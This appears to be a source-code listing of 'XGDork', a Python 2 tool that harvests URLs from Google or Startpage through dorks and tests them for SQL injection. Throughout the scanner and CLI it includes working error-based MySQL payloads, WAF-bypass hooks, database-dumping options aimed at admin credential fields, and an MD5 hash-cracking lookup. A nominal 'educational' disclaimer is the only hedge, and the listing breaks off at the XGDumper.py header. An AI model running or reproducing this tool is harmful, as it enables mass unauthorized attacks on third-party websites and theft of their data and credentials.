def myParserSQLE (url, forcing, timeout, inject):
    # probes one URL and returns a score ('lvl'): optional 'forcing' (stress)
    # checks on the named parameter, optional 'inject' (brutal dump) checks,
    # then the SFind scan of the plain response for database error strings;
    # returns 0 when the request failed

    lvl = 0
    terms_found = []
    nterms = 0

    burl = ""
    nurl = ""
    data = ""
    waf = 0
    fo = 0
    tmp_version = ""
    tmp_ndatabase = ""
    payload = ""

    user_agent = rand_agent()
    headers = {'User-Agent': user_agent}

    try:

        #ForcingOpt
        if (forcing != '' and url.find(forcing) > -1 and focpa(url, forcing) != -1):
            print colored(" [!] Forcing - stress URL", 'cyan')
            fo = 1
            forcing = str(forcing)
            burl = focpa(url, forcing)
            waf = waf_probe(burl, headers, timeout)

            # UNION with 300 columns (database() in column 155): a column
            # count mismatch error shows that the parameter reaches a query
            nurl = burl
            nurl += "-300 UNION SELECT "+",".join(["database()" if n == 155 else str(n) for n in range(1, 301)])+" --"
            if (waf == 1):
                nurl = sbws(nurl)
            data = fetch(nurl, headers, timeout)
            if (data.find('The used SELECT statements ') > -1):
                print colored(" [!] this technique is potentially feasible - ERROR-BASED -", 'green')
                print colored(" [*] Error potential : The used SELECT statements, Others errors ...", 'cyan')
                lvl += 10

            # ORDER BY a column index that cannot exist
            nurl = burl
            nurl += "777 ORDER BY 777 --"
            if (waf == 1):
                nurl = sbws(nurl)
            data = fetch(nurl, headers, timeout)
            if ((data.find("Unknown column '") > -1 and data.find("' in 'order clause'") > -1) or data.find('mysql_num_rows():') > -1 or data.find('mysql_num_row():') > -1):
                print colored(" [!] this technique is potentially feasible - UNION-BASED - ", 'green')
                print colored(" [*] Error potential : Unknown column in 'order clause', mysql_num_rows():, mysql_num_row():, Others errors...", 'cyan')
                lvl += 10

        #Brutal dump: error-based extraction of version() and database()
        if (inject != '' and url.find(inject) > -1 and focpa(url, inject) != -1):
            print colored(" [!] Brutal Dump", 'cyan')
            inject = str(inject)
            burl = focpa(url, inject)
            if (fo == 0):
                waf = waf_probe(burl, headers, timeout)

            # three techniques, tried in turn; each makes MySQL raise a
            # "Duplicate entry" error whose key contains the function result
            # wrapped in the markers 0x28,0x5e,0x23,0x5e,0x29 = "(^#^)" and
            # 0x28,0x56,0x23,0x56,0x29 = "(V#V)" (the duplicate comes from
            # grouping on floor(rand(0)*2), which is not stable across rows);
            # '%s' receives version() first and database() second.
            # Two fixes against the original: the first technique requested
            # the un-injected url instead of the payload, and the second
            # spelled FLOOR as FL0OR (digit zero), a function MySQL lacks.
            techniques = [
                "1 OR 1984 GROUP BY CONCAT(0x28,0x5e,0x23,0x5e,0x29,%s,0x28,0x56,0x23,0x56,0x29,floor(rand(0)*2)) HAVING MIN(0) OR 1 --",
                "1 OR (SELECT 1984 FROM (SELECT COUNT(*),CONCAT(0x28,0x5e,0x23,0x5e,0x29,%s,0x28,0x56,0x23,0x56,0x29,(SELECT(ELT(1984=1984,1))),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) --",
                "1 OR (SELECT 1984 FROM (SELECT COUNT(*),CONCAT(0x28,0x5e,0x23,0x5e,0x29,%s,0x28,0x56,0x23,0x56,0x29,CEILING(RAND(0)*CONVERT(2,BINARY)))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) --",
            ]
            for technique in techniques:
                nurl = burl+(technique % "version()")
                if (waf == 1):
                    nurl = sbws(nurl)
                data = fetch(nurl, headers, timeout)
                if (data.find("(^#^)") == -1):
                    continue

                tmp_version = str(parserDump(data, 1))
                tmp_version = tmp_version.replace('[', '').replace(']', '').replace("'", '')

                nurl = burl+(technique % "database()")
                if (waf == 1):
                    nurl = sbws(nurl)
                data = fetch(nurl, headers, timeout)

                tmp_ndatabase = str(parserDump(data, 1))
                tmp_ndatabase = tmp_ndatabase.replace('[', '').replace(']', '').replace("'", '')
                payload = nurl
                break

            if (tmp_version != '' or tmp_ndatabase != ''):
                print colored(" [*] Infos obtained brutally: ", 'green')
                print colored(" - [Version] "+tmp_version, 'yellow')
                print colored(" - [Database] "+tmp_ndatabase, 'yellow')
                print colored(" - [Payload] "+payload, 'yellow')
                lvl += 10


        data = fetch(url, headers, timeout)

        #SFind: score the untouched response on database / PHP error strings
        # (term, weight); the original had a no-op 'lvl == 1' for the ODBC
        # entry and a misspelled counter for parse_ini_file
        signatures = [
            ('MySQL', 1),
            ('SQL', 1),
            ('SQL syntax', 3),
            ('Warning:', 1),
            ('Invalid argument supplied for', 1),
            ('Notice: Undefined variable: ', 2),
            ('supplied argument is not a valid MySQL result resource in', 4),
            ('valid MySQL result', 5),
            ('Incorrect syntax near', 4),
            ('Incorrect parameter count in the call to native function ', 4),
            ('You have an error in your SQL syntax', 5),
            ('Warning: mysql_num_rows(): ', 5),
            ('Warning: mysql_num_row(): ', 5),
            ('Warning: mysql_fetch_array(): ', 4),
            ('Warning: mysql_query(): ', 4),
            ('Warning: mysql_result(): ', 4),
            ('Warning: Unknown(): ', 3),
            ('Warning: array_merge(): ', 3),
            ('Warning: require(): ', 3),
            ('MySQL Error: ', 3),
            ('SQL Error: ', 3),
            ('Unable to jump to row', 2),
            ('Session halted.', 3),
            ('Access denied for', 2),
            ('ODBC SQL Server Driver', 1),
            ('argument should be an array in', 4),
            (' expects parameter 1 to be resource, boolean given in ', 3),
            ('Warning: array_key_exists()', 2),
            ('Warning: parse_ini_file', 2),
            ('SAFE MODE Restriction in effect.', 1),
        ]
        for (term, weight) in signatures:
            if (data.find(term) > -1):
                terms_found.append(term)
                nterms += 1
                lvl += weight

        # map the score to the verdict shown to the user
        bands = [
            (1, 3, "Very Low"),
            (4, 5, "Low"),
            (6, 8, "Medium"),
            (9, 14, "High *Critical"),
            (15, None, "Legendary *Critical+"),
        ]
        for (low, high, label) in bands:
            if (lvl >= low and (high is None or lvl <= high)):
                print colored(" [!] Vulnerable [!] ", 'green')
                print colored(" Parser Lvl : "+str(lvl)+" - "+label, 'cyan')
                print colored(" Term(s) overview : <"+str(nterms)+"> "+str(terms_found).replace(',', ' <-> '), 'green')
                return lvl

        print colored(" [-] Grrr ...", 'red')
        return lvl

    except (requests.exceptions.ConnectionError, requests.exceptions.TooManyRedirects):
        print colored(" [-] Request Error, ignored ... ", 'cyan')
    except requests.exceptions.ReadTimeout:
        print colored(" [-] Request Timeout, ignored ... ", 'cyan')

    return 0



def marvin_ppa (url, out_file, forcing, timeout, inject, mores):
    # scans a single URL; with mores == 1 the host is resolved first;
    # the URL is appended to out_file when the parser scores it above 0

    i = 0
    c = 0
    surl = ""
    print colored("\n [Marvin Ppa] work on "+url, 'blue')
    if (mores == 1):
        # host name = everything between the scheme and the first '/' after it
        while (i < len(url)):
            if (url[i] == '/' and i > 12):
                break
            i += 1
        c = i-1
        if (url.find("http://") > -1):
            surl = block_cutter(url, 7, c)
        elif (url.find("https://") > -1):
            surl = block_cutter(url, 8, c)
        # resolve the host (the original connected to port 80 and read the
        # peer address, and did not catch resolution failures)
        try:
            minfos = socket.gethostbyname(surl)
        except socket.error:
            minfos = "unresolved"
        print colored(" [!] IP Overview: "+str(minfos), 'green')

    # append the tool's quote-breaking probe to the parameter
    qurl = url+"%%2727"
    if (url.find('search.php?search_id=') > -1):
        qurl = block_cutter(url, 0, (url.find('search.php?search_id=')+len("search.php?search_id=")-1))
        qurl += "1%%2727"

    if (myParserSQLE (qurl, forcing, timeout, inject) > 0):
        dump = open(out_file, 'a')
        dump.write(url+"\n")
        dump.close()
        return 1
    else:
        return 0


def moulinette (urls, out_file, forcing, timeout, inject, mores):
    # runs marvin_ppa over every URL and counts the ones recorded as vulnerable

    i = 0
    n = 0
    stress = 0

    while (i < len(urls)):
        stress = marvin_ppa (urls[i], out_file, forcing, timeout, inject, mores)
        if (stress == 1):
            n += 1
        i += 1

    return n



def search_engine (dork, n_page, out_file, bp, cdom, forcing, timeout, inject, mores):
    # crawls the search engine for the dork (Google by default, startpage
    # when bp > 0), then hands every candidate URL to marvin_ppa

    IP_PO = ipuser()
    print colored("\n [*] Public IP overview: "+IP_PO+"", 'blue')

    urls_found = []
    i = 0

    tmplistA = []
    tmplistB = []
    nosearch = 0

    # n_page is either "N" or "range(first,last)"
    pages = dump_page(n_page)
    if (len(pages) > 1):
        i = int(pages[0])
        if (i <= 0):
            i = 1
        n_page = int(pages[1])
    else:
        i = 0
        n_page = int(pages[0])

    if (len(cdom) > 0):
        if (cdom[0] == '.'):
            cdom = block_cutter(cdom, 1, len(cdom)-1)

    print colored(" [*] GSE Crawling wait ...", 'cyan')

    while (i <= n_page-1):

        g_page = str(i*10)

        user_agent = rand_agent()
        headers = {'User-Agent': user_agent}

        print colored("\n [] ", 'cyan')
        print colored(" [+] User-Agent: "+user_agent, 'green')

        time.sleep(randint(1, 3))
        if (bp > 0):
            nurl = "https://s10-eu4.startpage.com/do/search?cmd=process_search&language=english&prf=21334709fc6a498bfad2ed75d1597501&suggestOn=1&qid=&rcount=&rl=NONE&abp=1&t=night&query="+dork+"&cat=web&engine0=v1all&startat="+g_page+"&nj=0"
        else:
            if (cdom != ''):
                print colored(" [+] Domain: "+cdom, 'green')
                nurl = "https://www.google."+cdom+"/search?q="+dork+"&start="+g_page+"&num=10&filter=0"
            else:
                nurl = "https://www.google.com/search?q="+dork+"&start="+g_page+"&num=10&filter=0"

        greq = requests.get(nurl, headers=headers)
        gdata = greq.text.encode('utf-8')

        tmplistA = myParserGSE (gdata, bp)

        if (nosearch >= 1):
            break
        if (len(tmplistA) == 0):
            # an empty page; a second one in a row ends the crawl
            # (the original tested len-1 == 0, i.e. a page with one hit)
            nosearch += 1
        else:
            if ("!gsec!" in tmplistA):
                # Google's "unusual traffic" page: stop crawling
                # (the original wrote '"!gsec!" in tmplistA == True', which
                # Python reads as a chained comparison that is never true)
                tmplistA.remove("!gsec!")
                break
            if (sorted(tmplistA) == sorted(tmplistB)):
                # same result set as the previous page: no more pages
                break

            nosearch = 0
            urls_found += tmplistA

        tmplistB = tmplistA

        i += 1


    urls_found = list(set(urls_found))

    if (len(urls_found) > 0):
        print colored("\n [*] GSE Crawling finished, Marvin Ppa > \n", 'cyan')
        nbr = moulinette (urls_found, out_file, forcing, timeout, inject, mores)
        print colored("\n\n [!] URLs Saved: "+str(nbr)+" in '"+out_file+"' !", 'green')
        print colored(" [*] Verify that these are not false positives ! ... \n\n", 'red')

    else:
        print colored(" [!] List is empty, Marvin Ppa is not happy ... ", 'red')



--------------------------------------------------------------------------------
/XGDork.py:
--------------------------------------------------------------------------------


# This program is a 'total' free software: you can redistribute it and/or modify - ViraX
# You can quote me as a source.
5 | 6 | import os 7 | import sys 8 | import time 9 | import requests 10 | from random import randint 11 | from termcolor import colored 12 | from XGDlib import search_engine, dump_page 13 | from XGDumper import MOCA 14 | from XGDtoolz import genDork, Ex 15 | 16 | argc = len(sys.argv) 17 | iargs = 1 18 | dump_module = 0 19 | 20 | data_ipo = -1 21 | data_dork = "" 22 | data_page = -1 23 | data_file = "" 24 | data_bypass = -1 25 | data_cdom = "" 26 | data_forcing = "" 27 | data_timeout = -1 28 | data_gdork = -1 29 | data_x = -1 30 | data_xkey = "" 31 | data_inject = "" 32 | data_mores = -1 33 | 34 | data_url = "" 35 | data_param = "" 36 | data_mod = 0 37 | data_table = "" 38 | data_fields = "" 39 | fields_list = [] 40 | 41 | while (iargs < argc): 42 | 43 | if (argc < 2): 44 | print colored("Params Error, please use XGDork.py --help ! \n", 'red') 45 | exit() 46 | 47 | if ((sys.argv[iargs] == '-h' or sys.argv[iargs] == '--help') and argc == 2): 48 | 49 | print colored("\n [XGDork - Scanner]", 'green') 50 | print (" USE : XGDork.py -d 'your_dork' -p 'page_number' -o 'out_file' \n") 51 | 52 | print (" -d or --dork 'your_dork' :add your dork, for search") 53 | print (" e,g: -d .php?id= ") 54 | print (" [OR] ") 55 | print (" -gd or --gendork :add a dork generated, for search") 56 | print (" e,g: -gd \n") 57 | 58 | print (" -cd or --cdomain 'your_custom_domain' :add custom google domain") 59 | print (" e,g: -cd .com \n") 60 | 61 | print (" -p or --page 'page_number' :add pages max number") 62 | print (" e,g: -p 10 \n") 63 | 64 | print (" -p or --page 'range(n1,n2)' or 'n1,n2' :add pages number with range") 65 | print (" e,g: -p range(2,6) ") 66 | print (" e,g: -p 2,6 \n") 67 | 68 | print (" -o or --outfile 'out_file' :save result") 69 | print (" e,g: -o urls_sqli.txt \n") 70 | 71 | print (" -b or --bypass '1' :active bypass mode") 72 | print (" e,g: -b 1 \n") 73 | 74 | print (" -m or --mores '1' :mores infos, IPeer") 75 | print (" e,g: -m 1 \n") 76 | 77 | print (" -f or 
--forcing 'param_i' :stress url test, detect simple WAF and force error") 78 | print (" e,g: -f id= \n") 79 | 80 | print (" -i or --inject 'param_i' :brutal option, detect simple WAF and dump infos - ERROR Based") 81 | print (" e,g: -i id= \n") 82 | 83 | print (" -t or --timeout n :add timeout for requests/SQLparser(Reading)") 84 | print (" e,g: -t 5 \n") 85 | 86 | print (" -ex or --Ex 'your_custom_key' :encrypt your result (simple, weak)") 87 | print (" e,g: -ex '123' \n") 88 | 89 | 90 | print colored(" [XGDump - Dumper Mod]", 'green') 91 | print (" USE : XGDork.py --xgdump 'your_url_target' 'param_inject' 'mode' 'table' 'field1,field2..etc' :try inject and dump infos \n") 92 | 93 | print (" --xgdump 'url' 'param_i' '1' :try dump database_name_version") 94 | print (" e,g: -xgdump 'www.testwebsite.com/data/item.php?id=1984' id= 1 \n") 95 | 96 | print (" --xgdump 'url' 'param_i' '2' :try dump_tables") 97 | print (" e,g: -xgdump 'www.testwebsite.com/data/item.php?id=1984' id= 2 \n") 98 | 99 | print (" --xgdump 'url' 'param_i' '3' 'table' :try dump columns") 100 | print (" e,g: -xgdump 'www.testwebsite.com/data/item.php?id=1984 id= 3 tbl_admin' \n") 101 | 102 | print (" --xgdump 'url' 'param_i' '4' 'table' 'fields' :try dump fields_data") 103 | print (" e,g: -xgdump 'www.testwebsite.com/data/item.php?id=1984' id= 4 tbl_admin admin_id,admin_login,admin_password \n") 104 | 105 | 106 | print colored(" [XGDtoolz - simple Tools]", 'green') 107 | print (" USE : XGDtoolz.py --TOOL --ARGS :simple tools integrate with XGDork \n") 108 | 109 | print (" -gd or --gendork :allow to generate a dork") 110 | print (" e,g: XGDtoolz -gd \n") 111 | 112 | print (" -xmd5 or --xmd5 'your_hash' :try to find a string equal to the given hash") 113 | print (" e,g: XGDtoolz.py -xmd5 '1b36ea1c9b7a1c3ad668b8bb5df7963f' \n") 114 | 115 | print (" -ex or --Ex -s or --string 'string' -fs or --filestring 'file' -k or --key 'your_key' :allow encrypt a string or file") 116 | print (" e,g: XGDtoolz.py -ex 
-s 'Hello World' -k 'abc'") 117 | print (" e,g: XGDtoolz.py -ex -fs myfile.txt -k 'abc' \n") 118 | 119 | print (" -dx or --Dx -s or --string 'string' -fs or --filestring 'file' -k or --key 'your_key' :allow decrypt (string or file) Ex") 120 | print (" e,g: XGDtoolz.py -dx -s '###=0SLO...YkD...2DMi...0SL@@@' -k 'abc'") 121 | print (" e,g: XGDtoolz.py -dx -fs myfile.txt -k 'abc' \n") 122 | 123 | print ('\n') 124 | exit() 125 | 126 | 127 | if (sys.argv[iargs] == '-xgdump' or sys.argv[iargs] == '--xgdump'): 128 | data_url = sys.argv[iargs+1] 129 | data_param = sys.argv[iargs+2] 130 | data_mod = sys.argv[iargs+3] 131 | if (int(data_mod) >= 3): 132 | data_table = sys.argv[iargs+4] 133 | if (int(data_mod) == 4): 134 | data_fields = sys.argv[iargs+5] 135 | dump_module = 1 136 | 137 | 138 | if (sys.argv[iargs] == '-d' or sys.argv[iargs] == "--dork" or sys.argv[iargs] == '-gd' or sys.argv[iargs] == "--gendork"): 139 | if (sys.argv[iargs] == '-gd' or sys.argv[iargs] == "--gendork"): 140 | data_dork = genDork(0) 141 | else: 142 | data_dork = sys.argv[iargs+1] 143 | if (sys.argv[iargs] == '-p' or sys.argv[iargs] == "--page"): 144 | data_page = sys.argv[iargs+1] 145 | if (sys.argv[iargs] == '-cd' or sys.argv[iargs] == "--cdomain"): 146 | data_cdom = sys.argv[iargs+1] 147 | if (sys.argv[iargs] == '-o' or sys.argv[iargs] == "--outfile"): 148 | data_file = sys.argv[iargs+1] 149 | if (sys.argv[iargs] == '-b' or sys.argv[iargs] == "--bypass"): 150 | data_bypass = int(sys.argv[iargs+1]) 151 | if (sys.argv[iargs] == '-f' or sys.argv[iargs] == "--forcing"): 152 | data_forcing = sys.argv[iargs+1] 153 | if (sys.argv[iargs] == '-t' or sys.argv[iargs] == "--timeout"): 154 | data_timeout = int(sys.argv[iargs+1]) 155 | if (sys.argv[iargs] == '-ex' or sys.argv[iargs] == "--Ex"): 156 | data_x = 1 157 | data_xkey = sys.argv[iargs+1] 158 | if (sys.argv[iargs] == "-i" or sys.argv[iargs] == "--inject"): 159 | data_inject = sys.argv[iargs+1] 160 | if (sys.argv[iargs] == '-m' or sys.argv[iargs] == 
"--mores"): 161 | data_mores = int(sys.argv[iargs+1]) 162 | iargs += 1 163 | 164 | 165 | if ((data_dork != '' and data_page > 0 and data_file != '') or dump_module == 1): 166 | 167 | print ("\n\n") 168 | print colored(" __ ______ ____ 42 _ ", 'blue') 169 | print colored(" \ \/ / ___| _ \ ___ _ __| | __ ", 'blue') 170 | print colored(" \ / | _| | | |/ _ \| '__| |/ / ", 'blue') 171 | print colored(" / \ |_| | |_| | (_) | | | < ", 'blue') 172 | print colored(" /_/\_\____|____/ \___/|_| |_|\_\ \n", 'blue') 173 | print colored(" --- ViraX Google Dork Scanner --- \n", 'cyan') 174 | 175 | print (" Original code by ViraX") 176 | print (" Version: final-1.0k2 FreeSoftware for Python 2.7") 177 | print (" Compatible Mobile - Android (NoRoot) - Termux \n") 178 | 179 | print colored(" Contributor(s)/Source(s)", 'cyan') 180 | print (" - SQLmap ('agents file') - https://github.com/sqlmapproject/ ") 181 | print (" - ") 182 | print ("\n") 183 | 184 | print colored(" [!] DISCLAIMER: A simple 'naive' tool to find SQLi Vulnerable websites in the wild via Google.", 'green') 185 | print colored(" I am not responsible for illegal acts that you would do with this program !, only educational . [!] \n", 'green') 186 | 187 | 188 | print colored("\n [!] XGDork Start ["+str(time.ctime())+"] ... [!] \n", 'blue') 189 | 190 | 191 | if (dump_module == 1): 192 | fields_list = data_fields.split(',') 193 | print colored(" [*] Warning: XGDump is only based on the simple attack(s) for MySQL >= 5 (Generic)... 
it's a naive module ...\n", 'red') 194 | 195 | print colored(" [*] URL: "+data_url, 'cyan') 196 | print colored(" [*] Param: "+data_param, 'cyan') 197 | if (int(data_mod) < 3): 198 | print colored(" [*] Mode: "+str(data_mod)+"\n", 'cyan') 199 | elif (int(data_mod) == 3): 200 | print colored(" [*] Mode: "+str(data_mod)+" Table: "+data_table+"\n", 'cyan') 201 | elif (int(data_mod) == 4): 202 | print colored(" [*] Mode: "+str(data_mod)+" Table: "+data_table+" Fields: "+str(fields_list).replace(']', '').replace('[', '')+"\n", 'cyan') 203 | 204 | MOCA(data_url, data_param, int(data_mod), data_table, fields_list) 205 | print colored("\n [!] ["+str(time.ctime())+"] ... XGDork End [!] \n", 'blue') 206 | exit(0) 207 | else: 208 | 209 | data_file = str(data_file).replace('\n', '').replace(' ', '') 210 | nfile = open(data_file, 'w') 211 | nfile.write("--- XGDork Result [ "+data_dork+" ] --- \n") 212 | nfile.close() 213 | 214 | if (data_bypass > 0): 215 | print colored(" [*] Warning: Bypass mode is active, it may not work...", 'red') 216 | 217 | print colored(" [*] let's try with [ "+data_dork+" ] Happy hunting ! ;) ", 'cyan') 218 | search_engine (data_dork, data_page, data_file, data_bypass, data_cdom, data_forcing, data_timeout, data_inject, data_mores) 219 | if (data_x == 1): 220 | Ex ("", data_file, data_xkey, 256) 221 | 222 | print colored("\n [!] ["+str(time.ctime())+"] ... XGDork End [!] \n", 'blue') 223 | exit(1) 224 | 225 | else: 226 | print ("! USE : XGDork.py -h [OR] --help !") 227 | exit() 228 | -------------------------------------------------------------------------------- /XGDtoolz.py: -------------------------------------------------------------------------------- 1 | 2 | 3 | # This program is a 'total' free software: you can redistribute it and/or modify - ViraX 4 | # You can quoted me as a source. 5 | 6 | # svpEx/Ex svpDx/Dx is a simple symetric encryption system Blaise Vigenere based improve in 256 with key. 
7 | 8 | import os, sys, base64 9 | from random import randint 10 | from XGDlib import block_cutter 11 | import requests 12 | import termios, tty, time, select 13 | 14 | def svpEx (string, keyuser, modulo): 15 | 16 | size_s = len(string)-1 17 | size_k = len(keyuser) 18 | i = 0 19 | k = 0 20 | 21 | ndata = "" 22 | tmp_list = [] 23 | 24 | while (i <= size_s and k <= size_k and string[i] != ""): 25 | 26 | tmp_list.append(((ord(string[i]) + ord(keyuser[k])) % int(modulo))) 27 | 28 | if (tmp_list[i] > modulo): 29 | tmp_list[i] -= modulo 30 | elif (tmp_list[i] < 32): 31 | tmp_list[i] += 32 32 | 33 | tmp_list[i] = chr(tmp_list[i]) 34 | k += 1 35 | i += 1 36 | 37 | if (k == size_k): 38 | k = 0 39 | 40 | ndata = "".join(tmp_list) 41 | return ndata 42 | 43 | 44 | 45 | 46 | def svpDx (string, keyuser, modulo): 47 | 48 | size_s = len(string)-1 49 | size_k = len(keyuser) 50 | i = 0 51 | k = 0 52 | 53 | ndata = "" 54 | tmp_list = [] 55 | 56 | while (i <= size_s and k <= size_k and string[i] != ""): 57 | 58 | tmp_list.append(((ord(string[i]) - ord(keyuser[k])) % int(modulo))) 59 | 60 | if (tmp_list[i] > modulo): 61 | tmp_list[i] -= modulo 62 | elif (tmp_list[i] < 32): 63 | tmp_list[i] += 32 64 | 65 | tmp_list[i] = chr(tmp_list[i]) 66 | k += 1 67 | i += 1 68 | 69 | if (k == size_k): 70 | k = 0 71 | 72 | ndata = "".join(tmp_list) 73 | return ndata 74 | 75 | 76 | 77 | 78 | def Ex (string, fstring, keyuser, modulo): 79 | 80 | nfile = file 81 | tmp_list = [] 82 | if (string == "" and fstring != ""): 83 | nfile = open(fstring, 'r') 84 | tmp_list = nfile.readlines() 85 | string = "".join(tmp_list) 86 | nfile.close() 87 | 88 | string = string[::-1] 89 | string = svpEx (string, keyuser, modulo) 90 | string = base64.b64encode(string) 91 | string = str(string.encode('hex')) 92 | string = svpEx (string, keyuser, modulo) 93 | 94 | string = str(string.encode('hex')) 95 | string = str("**-*"+str(string)+"*-**") 96 | string = string.replace('0', 'G').replace('1', 'A').replace('2', 
'R').replace('3','K').replace('4', 'Y').replace('5', 'W').replace('6', 'S').replace('7', 'N').replace('8', 'Z').replace('9', 'V').replace('a', ':').replace('b', ';').replace('c', '?').replace('d', ',').replace('e', '!').replace('f', '.') 97 | string = svpEx (string, str("1984+_-_/:*ViraX("+keyuser+")2018+-_-;*vIRAx+"), modulo) 98 | string = str(string.encode('hex')) 99 | string = str("---@"+str(string)+"@---") 100 | string = str(base64.b64encode(string)) 101 | string = string.replace("==", '') 102 | string = string[::-1] 103 | string = str("###"+str(string)+"@@@") 104 | 105 | if (fstring != ""): 106 | nfile = open(fstring, 'w') 107 | nfile.write(string) 108 | nfile.close 109 | 110 | return string 111 | 112 | 113 | 114 | def Dx (string, fstring, keyuser, modulo): 115 | 116 | i = 0 117 | nfile = file 118 | tmp_list = [] 119 | if (string == "" and fstring != ""): 120 | nfile = open(fstring, 'r') 121 | tmp_list = nfile.readlines() 122 | string = "".join(tmp_list) 123 | nfile.close() 124 | 125 | string = string.replace("###", '').replace("@@@", '') 126 | string = string[::-1] 127 | string = str(str(string)+"==") 128 | string = str(base64.b64decode(string)) 129 | string = str(string.replace("---@", '').replace("@---", '')) 130 | string = str(string.decode('hex')) 131 | string = svpDx (string, str("1984+_-_/:*ViraX("+keyuser+")2018+-_-;*vIRAx+"), modulo) 132 | string = string.replace('G', '0').replace('A', '1').replace('R', '2').replace('K','3').replace('Y', '4').replace('W', '5').replace('S', '6').replace('N', '7').replace('Z', '8').replace('V', '9').replace(':', 'a').replace(';', 'b').replace('?', 'c').replace(',', 'd').replace('!','e').replace('.', 'f') 133 | string = str(string.replace("**-*", '').replace("*-**", '')) 134 | string = str(string.decode('hex')) 135 | 136 | string = svpDx (string, keyuser, modulo) 137 | string = str(string.decode('hex')) 138 | string = base64.b64decode(string) 139 | string = svpDx (string, keyuser, modulo) 140 | string = string[::-1] 141 
| 142 | if (fstring != ""): 143 | 144 | tmp_list = list(string) 145 | while (i < len(tmp_list)-1): 146 | if (tmp_list[i] == "*" and tmp_list[i+1] == "h"): 147 | tmp_list[i] = '\n' 148 | i += 1 149 | tmp_list[i] = '' 150 | string = "".join(tmp_list) 151 | 152 | nfile = open(fstring, 'w') 153 | nfile.write(string) 154 | nfile.close() 155 | 156 | return string 157 | 158 | 159 | def genDork (out): 160 | 161 | d_npage = "" 162 | d_ext = "" 163 | d_param = "" 164 | d_data = "" 165 | d_keyword = "" 166 | size = 0 167 | 168 | nfile = file 169 | nfile = open("gd_namespage.txt", 'r') 170 | size = len(nfile.readlines())-1 171 | nfile.close 172 | nfile = open("gd_namespage.txt",'r') 173 | d_npage = str(nfile.readlines()[randint(0,size)].replace('\n','')) 174 | nfile.close() 175 | 176 | nfile = file 177 | nfile = open("gd_ext.txt", 'r') 178 | size = len(nfile.readlines())-1 179 | nfile.close() 180 | nfile = open("gd_ext.txt", 'r') 181 | d_ext = str(nfile.readlines()[randint(0,size)].replace('\n', '')) 182 | nfile.close() 183 | 184 | nfile = file 185 | nfile = open("gd_params.txt",'r') 186 | size = len(nfile.readlines())-1 187 | nfile.close() 188 | nfile = open("gd_params.txt", 'r') 189 | d_param = str(nfile.readlines()[randint(0,size)].replace('\n', '')) 190 | nfile.close() 191 | 192 | nfile = file 193 | nfile = open("gd_data.txt", 'r') 194 | size = len(nfile.readlines())-1 195 | nfile.close() 196 | nfile = open("gd_data.txt", 'r') 197 | d_data = str(nfile.readlines()[randint(0,size)].replace('\n', '')) 198 | nfile.close() 199 | 200 | nfile = file 201 | nfile = open("gd_keywords.txt", 'r') 202 | size = len(nfile.readlines())-1 203 | nfile.close() 204 | nfile = open("gd_keywords.txt", 'r') 205 | d_keyword = str(nfile.readlines()[randint(0,size)].replace('\n', '')) 206 | nfile.close() 207 | 208 | gdork = str("inurl:"+d_npage+d_ext+d_param+" "+d_keyword) 209 | 210 | if (out == 1): 211 | print gdork 212 | 213 | return gdork 214 | 215 | 216 | 217 | 218 | def s5o (hashstring): 219 | 
220 | ca = 0 221 | cb = 0 222 | i = 0 223 | 224 | nurl = "http://www.nitrxgen.net/md5db/"+str(hashstring) 225 | r = requests.get(nurl) 226 | hash_value = r.text.encode('utf-8') 227 | if (hash_value == ''): 228 | nurl = "https://www.google.com/search?q="+str(hashstring)+" plain:" 229 | r = requests.get(nurl) 230 | data = r.text.encode('utf-8') 231 | nurl = "https://www.google.com/search?q=list intext:Hash:"+str(hashstring)+" & intext:Plain:" 232 | r = requests.get(nurl) 233 | data += r.text.encode('utf-8') 234 | while (i < len(data)-1): 235 | if (data[i] == 'H'): 236 | ca = i 237 | while (i < len(data)-1 and data[i] != ':'): 238 | i += 1 239 | cb = i 240 | tmp = block_cutter(data, ca, cb) 241 | if (tmp == 'Hash:'): 242 | while (i < len(data)-1 and data[i] != 'A'): 243 | i += 1 244 | cb = i 245 | found = block_cutter(data, ca, cb) 246 | hash_view = block_cutter(found, found.find('')+3, found.find('')-1) 247 | if (hash_view == hashstring): 248 | hash_value = block_cutter(found, found.find('Plain:')+14, found.find('. 
A')-1) 249 | if (hash_value != ''): 250 | return hash_value 251 | 252 | i += 1 253 | else: 254 | return hash_value 255 | 256 | return hash_value 257 | 258 | 259 | 260 | 261 | i = 1 262 | argc = len(sys.argv) 263 | if (argc >= 2): 264 | data_tool = str(sys.argv[1]) 265 | data_result = "" 266 | data_string = "" 267 | data_fs = "" 268 | data_key = "" 269 | data_modulo = 256 270 | 271 | 272 | if (data_tool == "--Ex" or data_tool == "-Ex" or data_tool == "-ex"): 273 | while (i < argc): 274 | if (sys.argv[i] == "-s" or sys.argv[i] == "--string"): 275 | data_string = sys.argv[i+1] 276 | if (sys.argv[i] == "--filestring" or sys.argv[i] == "-fs"): 277 | data_fs = sys.argv[i+1] 278 | if (sys.argv[i] == "-k" or sys.argv[i] == "--key"): 279 | data_key = sys.argv[i+1] 280 | i += 1 281 | data_result = Ex (data_string, data_fs, data_key, data_modulo) 282 | print (">> "+data_result) 283 | 284 | elif (data_tool == "--Dx" or data_tool == "-Dx" or data_tool == "-dx"): 285 | while (i < argc): 286 | if (sys.argv[i] == "-s" or sys.argv[i] == "--string"): 287 | data_string = sys.argv[i+1] 288 | if (sys.argv[i] == "-k" or sys.argv[i] == "--key"): 289 | data_key = sys.argv[i+1] 290 | if (sys.argv[i] == "--filestring" or sys.argv[i] == "-fs"): 291 | data_fs= sys.argv[i+1] 292 | i += 1 293 | data_result = Dx (data_string, data_fs, data_key, data_modulo) 294 | print (">> "+data_result) 295 | 296 | elif (data_tool =="--gendork" or data_tool == "-GD" or data_tool == "-gd"): 297 | data_result = genDork (0) 298 | print (">> "+data_result) 299 | 300 | elif (data_tool == "--xmd5" or data_tool == "-XMD5" or data_tool == "-xmd5"): 301 | data_result = s5o (sys.argv[2]) 302 | print (">> "+data_result) 303 | 304 | 305 | 306 | 307 | -------------------------------------------------------------------------------- /XGDumper.py: -------------------------------------------------------------------------------- 1 | 2 | 3 | # This program is a 'total' free software: you can redistribute it and/or modify - ViraX 
